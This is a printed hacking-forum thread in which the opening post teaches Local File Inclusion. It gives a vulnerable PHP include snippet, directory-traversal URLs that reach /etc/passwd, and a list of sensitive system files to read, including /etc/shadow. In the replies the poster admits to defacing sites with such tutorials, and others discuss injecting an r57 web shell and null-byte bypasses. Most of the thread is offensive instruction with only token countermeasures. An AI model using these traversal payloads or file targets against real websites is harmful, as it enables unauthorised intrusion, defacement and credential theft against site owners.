Sinisterly
Local File Incusion (LFI) - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Website & Server Hacking (https://sinister.ly/Forum-Website-Server-Hacking)
+--- Thread: Local File Incusion (LFI) (/Thread-Local-File-Incusion-LFI)

Local File Incusion (LFI) - *The ALLSTAR* - 05-04-2011

Local File inclusion is a common website hacking trick. This tutorial will show you how to exploit a website using LFI.
First of all, take a look on the given php code.
<?php
$page=$_GET[page];
include($page);
?>


The above given code is generally used in many website by web developers which should not
be use because the $page isn't sanitized and is passed directly to the webpage. This code is used by hackers for LFI.


In general, you have seen many URL's like this
www.site.com/index.php?page=products.php
the value passed through the query string is used to include products.php page by the above given php code without checking the proper format of value inserted at URL.
suppose we inserted the URL like this..
www.site.com/index.php?page=mypage.php
this mypage.php does not exists on the server so it will show a php error message on the webpage..



Warning: include() [function.include]: Failed opening 'mypage.php' for inclusion.........




here we go..
we know this is vulnerable.


If this website is hosted on a unix server, then we might be able to do a directory transversal to the password file.


The etc/passwd is where the users/passwords are stored


www.mywebsite.com/index.php?page=../etc/passwd
http://www.mywebsite.com/index.php?p.../../etc/passwd
http://www.mywebsite.com/index.php?p.../../etc/passwd
http://www.mywebsite.com/index.php?p.../../etc/passwd


try adding ../ till you get access to the passwd file..
here note one thing.
if the URL is like this.


www.site.com/index.php?page=products


then it means that the php code code is adding page extension manually. So php code is like this



<?php
$page=$_GET[page];
include($page.'php');
?>

in this case use for null extension at last.

www.site.com/index.php?page=../etc/passwd
www.site.com/index.php?page=../../../etc/passwd
http://www.site.com/index.php?page=..../../etc/passwd
and so on
after some effort you will be able to get the content of password file..


You can also view

etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

these files will also give you some useful informations of the server system.

Counter Measures

1. Use the latest web server software
2. Effectively filter the user's input

RE: Local File Incusion (LFI) - jalal77 - 05-04-2011

hey dude we will find etec/pwd file but u didnt explian onething...if how to read that password file??????it will not in clear text...just explin here also if how to read pasword.....

RE: Local File Incusion (LFI) - *The ALLSTAR* - 05-05-2011

the pass is in generally md5 but when u see the vulnerability working you need to inject the shell like r57

RE: Local File Incusion (LFI) - 1234hotmaster - 05-05-2011

[Image: owainoct21.jpg?w=708&h=438]


btw you forgot the
Quote:please comment below if this post is useful for you..
Smile

Tongue

RE: Local File Incusion (LFI) - Coder-san - 05-05-2011

@*The ALLSTAR*: Please credit the original author.

RE: Local File Incusion (LFI) - *The ALLSTAR* - 05-05-2011

To tell u in fact even I don't know who is original author I found a WordPress blog back at 2009, I am able to deface couple of site regarding this and many other tutorial on my collection. That's why I'm not taking any credit but it is very helpful whoever written this code I thank you whoever the dude maybe.

I hope it will help you out!
But only this tutorial it is useless almost I recommend everyone to know how to tamper data. If you still has more question feel free to ask here.

RE: Local File Incusion (LFI) - The Alchemist - 04-26-2012

Great tutorial whoever the original author is..

RE: Local File Incusion (LFI) - vikler - 07-28-2013

Nice tutorial, but can anyone help me on how to upload shell if I don't have access to /proc/self/environ ?

RE: Local File Incusion (LFI) - zomgwtfbbq - 07-28-2013

First of all I think I've already seen a FI tutorial here and not just one.
Second this wouldn't work on win os.
Third it's not necessary to keep adding ../ until you find root, just append 10 dir ups if you exceed it will still be going to root.
Fourth:
Quote:http://www.site.com/index.php?page=products


then it means that the php code code is adding page extension manually. So php code is like this



<?php
$page=$_GET[page];
include($page.'php');
?>
Should be:
<?php
$page=$_GET[page];
include($page.'.php');
?>
Also you could have explained about the poison null byte in order to exploit this:
http://hakipedia.com/index.php/Poison_Null_Byte

Last but not least, it's incredibly rude that you steal other's work and act like you created it by yourself.